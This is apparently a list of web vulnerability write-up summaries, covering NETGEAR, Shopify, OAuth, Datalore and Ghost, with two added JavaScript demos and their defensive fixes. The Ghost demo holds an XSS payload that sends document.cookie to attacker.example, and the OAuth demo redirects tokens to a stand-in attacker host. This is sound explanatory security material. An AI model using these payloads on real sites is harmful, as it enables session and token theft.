The idea here is that by overflowing the integer that stores the size of a header name you can cause the header to be misinterpreted.
Vulnerabilities tagged 'web'
New-line Injection to Uncontrolled File Write and Authentication Bypass in some NETGEAR Smart Switches
tl;dr A well positioned attacker (one that shares the victim's source IP address) can hijack a successful authentication flow and take over the victim's session by polling the get.cgi endpoint after the victim's login has succeeded but before the victim's browser has polled the same page (which it does every second)
An easy vulnerability that shows why checking the magic bytes of a file isn't always sufficient. For some file types all that matters is that the processor can detect its own content within another file…
The Shopify GraphQL endpoint has a mutation, appCreditCreate, that lets Shopify apps issue credits to merchants which can be used towards future app purchases. While this mutation cannot be used through the GraphQL endpoint at /admin/internal/web/graphql/core, the GraphiQL app provided by Shopify does allow the mutation…
Authentication bypass by including a magic string in the URL. The string isn't exactly magic; rather, it seems this page (setcup.cgi) has a single file that needs to be accessible without authentication…
I'm not sure what the normal flow for a "One Tap Password" is, but /scauth/otp/droid/logout can be used to retrieve the OTP token in the response, which can then be passed to /scauth/otp/login along with the username to log in.
tl;dr - The OAuth endpoint parses the URL parameter redirect_uri[0 (note the missing ]) as pointing to the same variable as redirect_uri, allowing the second to overwrite the first. The front-end however sees them as two distinct keys and so redirects the OAuth token to the redirect_uri value, while the endpoint validates that the other value points to a whitelisted location.
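The parser differential described above, as an added example that is not part of the original write-up. The back-end is modelled with a constructed PHP-style query parser that treats an unterminated "name[" as the bare "name" and lets the later value win; the front-end is modelled with the WHATWG URLSearchParams, which keeps "redirect_uri" and "redirect_uri[0" as unrelated keys. The allow-list, host names and function names are assumptions for illustration, not the vendor's.

```javascript
// Added example: parameter-parsing differential between a back-end validator
// and a front-end redirect. Not the real vendor's code; hosts are made up.

const ALLOWED_REDIRECTS = ['https://app.example.com/callback']; // assumed allow-list

// Constructed stand-in for a server-side query parser with PHP-style array
// syntax: "name[...]" belongs to "name"; an unterminated "[" is folded back
// onto the base key, and a later occurrence overwrites an earlier one.
function parseBracketStyle(query) {
  const out = {};
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const [rawName, rawValue = ''] = pair.split('=');
    let name = decodeURIComponent(rawName);
    const value = decodeURIComponent(rawValue);
    const bracket = name.indexOf('[');
    if (bracket !== -1 && !name.includes(']', bracket)) {
      name = name.slice(0, bracket); // "redirect_uri[0" collapses to "redirect_uri"
    }
    out[name] = value; // last value wins
  }
  return out;
}

// Back-end check as the write-up describes it: the value it sees must be allow-listed.
function backendAcceptsRedirect(query) {
  return ALLOWED_REDIRECTS.includes(parseBracketStyle(query).redirect_uri);
}

// Front-end redirect target: the first "redirect_uri" key as URLSearchParams sees it.
function frontendRedirectTarget(query) {
  return new URLSearchParams(query).get('redirect_uri');
}

// Where the token actually ends up, or null if the back-end refused the request.
function simulateAuthorize(query) {
  if (!backendAcceptsRedirect(query)) return null;
  return frontendRedirectTarget(query);
}

// One defensive check: refuse a request whose raw key set is ambiguous before
// either parser gets to interpret it (exactly one redirect_uri-shaped key).
function hasAmbiguousRedirectKeys(query) {
  const keys = [...new URLSearchParams(query).keys()];
  return keys.filter((k) => k === 'redirect_uri' || k.startsWith('redirect_uri[')).length !== 1;
}

// Constructed requests: a normal one and the attack (%5B is "[").
const benignQuery =
  'client_id=demo&redirect_uri=' + encodeURIComponent('https://app.example.com/callback');
const maliciousQuery =
  'client_id=demo&redirect_uri=' + encodeURIComponent('https://attacker.example/steal') +
  '&redirect_uri%5B0=' + encodeURIComponent('https://app.example.com/callback');

console.log('benign  ->', simulateAuthorize(benignQuery));
console.log('attack  ->', simulateAuthorize(maliciousQuery));
console.log('ambiguous?', hasAmbiguousRedirectKeys(maliciousQuery));
```

The back-end sees only the allow-listed value and approves; the front-end, reading the same query with a different parser, sends the token to the attacker's host. The durable fix is to have one component parse the query once and pass the resolved redirect target to both the check and the redirect; rejecting duplicate or bracketed redirect_uri keys, as in hasAmbiguousRedirectKeys, is a cheap extra guard.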
After finding an open redirect in Datalore's endpoint for authenticating via JetBrains, the author dug into the auth process to see if it could be turned into an attack. They discovered that if an auth_url parameter was specified (which had to be a valid JetBrains subdomain), Datalore would send the user, along with their JWT token, to the given URL…
Ghost 4.0.0 added a theme preview feature to the admin panel's front-end. The preview page contains a message event listener for postMessage(), which takes any message and writes it directly into the page contents…
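The listener pattern described above, as an added example rather than Ghost's own code: the unchecked shape first, then a hardened handler that checks the sender origin, requires a structured message and writes text rather than markup. The page is modelled as a plain object so the logic runs outside a browser; the origins and message shape are assumptions.

```javascript
// Added example (not Ghost's code): a postMessage listener with no origin or
// content check, beside a hardened version. "page" stands in for a DOM element.

function makePage() {
  return { html: '', text: '' };
}

// Vulnerable shape: any origin is accepted and the raw message is written as
// markup (in a real page: element.innerHTML = event.data).
function vulnerableHandler(page) {
  return (event) => {
    page.html = String(event.data);
    return true;
  };
}

// Hardened shape: allow-listed origins only, a typed message, text-only sink
// (in a real page: element.textContent = event.data.text).
function hardenedHandler(page, allowedOrigins) {
  return (event) => {
    if (!allowedOrigins.includes(event.origin)) return false;
    if (!event.data || typeof event.data !== 'object') return false;
    if (event.data.type !== 'preview' || typeof event.data.text !== 'string') return false;
    page.text = event.data.text;
    return true;
  };
}

// Constructed messages: one legitimate preview update from the admin origin,
// one from a hostile frame carrying markup with an event handler.
const ADMIN_ORIGIN = 'https://blog.example/ghost'; // assumed
const adminMessage = { origin: ADMIN_ORIGIN, data: { type: 'preview', text: 'Hello preview' } };
const hostileMessage = {
  origin: 'https://attacker.example',
  data: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

function runVulnerable() {
  const page = makePage();
  const handle = vulnerableHandler(page);
  return { admin: handle(adminMessage), hostile: handle(hostileMessage), page };
}

function runHardened() {
  const page = makePage();
  const handle = hardenedHandler(page, [ADMIN_ORIGIN]);
  return { admin: handle(adminMessage), hostile: handle(hostileMessage), page };
}

console.log('vulnerable page html:', runVulnerable().page.html);
console.log('hardened result:', runHardened());
```

In the vulnerable version the hostile frame's markup lands in the page and the handler has no way to tell who sent it. In a browser the origin check would usually compare event.origin against window.location.origin or a fixed list, never against a substring match; the structured-message check matters too, because an origin check alone still lets a trusted-origin sender inject markup if the sink is innerHTML.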